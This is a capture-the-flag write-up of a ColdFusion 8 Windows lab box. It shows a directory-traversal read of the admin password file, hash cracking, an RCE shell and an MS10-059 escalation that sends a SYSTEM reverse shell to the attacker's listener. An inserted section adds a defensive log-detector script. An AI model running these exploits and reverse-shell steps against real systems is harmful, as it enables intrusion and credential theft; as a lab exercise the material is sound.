Recon
nmap
```
└─$ rustscan -a 10.10.10.11 -b 2500 -- -T5 -Pn -sV -A
PORT      STATE SERVICE REASON  VERSION
135/tcp   open  msrpc   syn-ack Microsoft Windows RPC
8500/tcp  open  fmtp?   syn-ack
49154/tcp open  msrpc   syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
We face a Windows machine with only an RPC service and an unknown service on port 8500.
While browsing, I found that port 8500 is the default HTTP port used by Adobe ColdFusion.
Vulnerabilities
Running a searchsploit search, we found that Adobe ColdFusion has several vulnerabilities across multiple versions.
```
└─$ searchsploit adobe cold
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                             | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code  | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                      | multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                  | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                 | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE)                                | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass                          | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)             | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                    | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)          | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Quer | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String  | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' C | cfm/webapps/33168.txt
----------------------------------------------------------------------------------- ---------------------------------
```
```
# Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
└─$ python2 14641.py 10.10.10.11 8500 ../../../../../../../lib/password.properties
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
happyday         (?)
```
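A defender's counterpart to the traversal above, added here as an example that is not part of the original writeup: a small detector that flags access-log requests reaching ColdFusion's lib/password.properties through ../ sequences, including percent-encoded and null-byte variants. The log lines are constructed samples, and the query parameter and paths in them are my assumption about what such a request looks like, not values taken from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original writeup). The first
# two mimic the traversal read of lib/password.properties shown above, once plain
# and once percent-encoded; the last two are benign requests.
SAMPLE_LOG = """\
10.10.16.11 - - [22/Mar/2017:20:55:01 +0200] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 200 1412
10.10.16.11 - - [22/Mar/2017:20:55:09 +0200] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2F..%2F..%2F..%2F..%2Flib%2Fpassword.properties%00en HTTP/1.1" 200 1412
10.10.16.12 - - [22/Mar/2017:20:56:00 +0200] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
10.10.16.13 - - [22/Mar/2017:20:57:30 +0200] "GET /index.cfm HTTP/1.1" 200 2048
"""

# Common log format: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_target(target: str) -> str:
    """Percent-decode repeatedly (defeats double encoding), unify slashes, lowercase."""
    decoded = target
    for _ in range(3):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/").lower()


def classify(line: str):
    """Return a finding dict for a suspicious request line, or None if benign/unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = normalise_target(m["target"])
    reasons = []
    if "../" in target:
        reasons.append("traversal")
    if "password.properties" in target:
        reasons.append("password.properties")
    if "\x00" in target:  # %00 is used to truncate whatever the server appends
        reasons.append("null-byte")
    if not reasons:
        return None
    status = int(m["status"])
    # HTTP 200 on a request that reaches password.properties means the file was likely served.
    severity = "critical" if status == 200 and "password.properties" in reasons else "suspicious"
    return {"ip": m["ip"], "status": status, "severity": severity, "reasons": reasons}


def scan_log(text: str) -> list:
    return [hit for hit in map(classify, text.splitlines()) if hit]
```

Feed it real web-server logs instead of SAMPLE_LOG; a "critical" hit means the administrator hash has to be treated as compromised and rotated, in addition to patching.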
First shell
```
# Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
C:\ColdFusion8\runtime\bin>whoami
arctic\tolis
C:\Users\tolis\Desktop>type user.txt
**************************879c17
```
Path to the privesc
Local recon
Windows-exploit-suggester
```
└─$ python2 windows-exploit-suggester.py -d 2022-09-06-mssb.xls -i sysinfo -l
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done
```
We found that there is a vulnerability in the Tracing Feature for Services (MS10-059) that could allow elevation of privilege.
After finding an exploit on GitHub, I uploaded it to the target and executed it.
```
# On the target
C:\Windows\Temp\c>.\Chimichurri.exe 10.10.16.11 4446
# On the host
└─$ rlwrap nc -lnvp 4446
C:\Windows\Temp\c>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
**************************b97a0a
```
We now run as SYSTEM and can read the root flag :)
Easy, External, CMS, Penetration Tester Level 1, Unrestricted File Upload, A06:2021-Vulnerable And Outdated Components, Windows Vulnerabilities, Misconfiguration